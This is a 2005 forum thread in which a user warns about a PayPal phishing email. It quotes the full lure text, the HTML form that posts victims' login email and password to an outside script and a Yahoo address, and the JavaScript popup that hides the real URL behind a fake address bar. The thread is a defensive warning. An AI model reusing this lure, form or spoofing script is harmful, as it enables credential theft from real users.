Social disguises - Technology Forum

Home | News | Predictions | Forums | Login or create an account

News

	Archive
	Search
	Latest News

Predictions

	Predictions
	Faqs

Community

	Forums
	User Groups
	Feedback

Links and Downloads

	Web Links
	Downloads

Top Members	User Points
1: Nick	1370
2: HEMETIS	1289
3: Frankinstien	570
4: Roland	535
5: joseaugusto	380
6: cwes99_03	340
7: evolution	185
8: Rex	143
9: Pundit10	132
10: KingLeo	129

Top Experts	Expert Points
1:Nick	53891
2:archangel	13310
3:Rex	11193
4:HEMETIS	9916
5:Perrier	8886
6:RottiPaka	8634
7:conor	8585
8:DrDoom	6631
9:joseaugusto	6278
10:howdyhoe	5909

ZapFuture ~ View topic - Social disguises

Forum FAQ Search Memberlist Usergroups

Author

Message

< Technology ~ Social disguises

Frankinstien

Posted: Tue Jul 19, 2005 9:26 am

Mentor

Joined: Jun 21, 2005
Posts: 94

I recieved the email below, look it over carefully and go to the url.

Quote:

You have recieved this email because someone had tried to use your paypal
account at http://www.1-bulk-email-mailing-address -list.com Below are the details
about the transaction made:

Payment Details
Transaction ID: 4FS50663S0663861W
Total: $149.00 USD
Item/Product Name: America Email Address For Email Marketing and Email
Advertising

Business Information
Business: Beyond W Limited
Contact E-Mail: support@beyondw.com
Message: send me msg
to my mail new_paypal@yahoo.com
Date : Thursday, Jul 14
To confirm or decline this transaction, please follow the link provide below

www.paypal.com/confirm-pp 4145570

Log into your account and follow the instructions listed. Please save the fraud
alert id for your reference.
If we do not get the confirmation within 5 business days, your account will be
suspended until further notice.

*Please do not respond to this e-mail as your reply will not be received.

Thanks for your patience as we work together to protect your account.

Sincerely,
PayPal Security Team
----------------------------------------------------------------
PROTECT YOUR PASSWORD

NEVER give your password to anyone and ONLY log in at https://www.paypal.com.
Protect yourself against fraudulent websites by opening a new web browser
(e.g. Internet Explorer or Netscape) and typing in the PayPal URL every time
you log in to your account.

----------------------------------------------------------------
Please do not reply to this email. This mailbox is not monitored and you will not
receive a response. For assistance, log in to your PayPal account and click the
Help link located in the top right corner of any PayPal page.
PayPal Alert ID : PP4145570

You have to look carefully at the url site because it is a very subtle fraud! You'll notice in the url address in your browser is actually masked by a borderless popup window! The real url address is http://210.180.201.131/.data/secure/certificates/SSL/login.htm

The root url 210.180.201.131 seems to be a school in China! But the cgi is at http://heavyhitterleads.com/cgi-bin/bnbform.cgi. Not only that but it notifies the theif through a yahoo email: jennifermack54@yahoo.com

Below is the html code that sends the victums information:

Quote:

“<form name=‘login_form’ <form onsubmit=‘return formCheck(this);’
action=‘http://heavyhitterleads.com/cgi-bin/bnbform.cgi’ method=‘post’>
<input type=‘hidden’ name=‘required’ value=‘login_email’><input type=‘hidden’
name=‘data_order’ value=‘login_email,login_password’><input type=‘hidden’ name=‘submit_to’
value=‘jennifermack54@yahoo.com’><input type=‘hidden’ name=‘form_id’
value=‘Lead Registration’><input type=‘hidden’ name=‘outputfile’ value=‘registration’><input
type=‘hidden’ name=‘ok_url’
value=‘http://210.180.201.131/.data/secure/certificates/SSL/processing.htm’><input
type=‘hidden’ name=‘cmd’ value=‘_login-submit’><input type=‘hidden’ name=‘login_cmd’ value><input
type=‘hidden’ name=‘login_params’ value><input type=‘hidden’ name=‘login_cancel_cmd’ value>”

Here's the javascript that produces the mask:

Quote:

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
];
vuln_x= window.screenLeft+72;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-200;
vuln_h= 17;
vuln_show();
}

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;
vuln_show();
}

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);
}

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px; font-family: \'Tahoma\', sans-serif; font-size: 8pt;">https://www.paypal.com/cgi-bin/webscr?cmd=_login-run'

if (window.createPopup) {
vuln_calc();
vuln_pop();
window.setInterval(vuln_calc, 25);
} else {
}

This one is the best I've seen of these types of fony emails. Watch out the bad guys are getting better! Shocked

HEMETIS

Posted: Wed Jul 20, 2005 8:05 am

Expert

Joined: Nov 17, 2004
Posts: 158
Location: Egypt

Thank you Frank for your warning. Very Happy

_________________
Hemetis

Display posts from previous:

All times are GMT

View next topic View previous topic	Page 1 of 1
ZapFuture Forum Index ~ Technology

Jump to:

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

We recommend:

Search Amazon

Recommended sites:

· Encyclopaedia · Wikipedia

· Encyclopaedia
· Wikipedia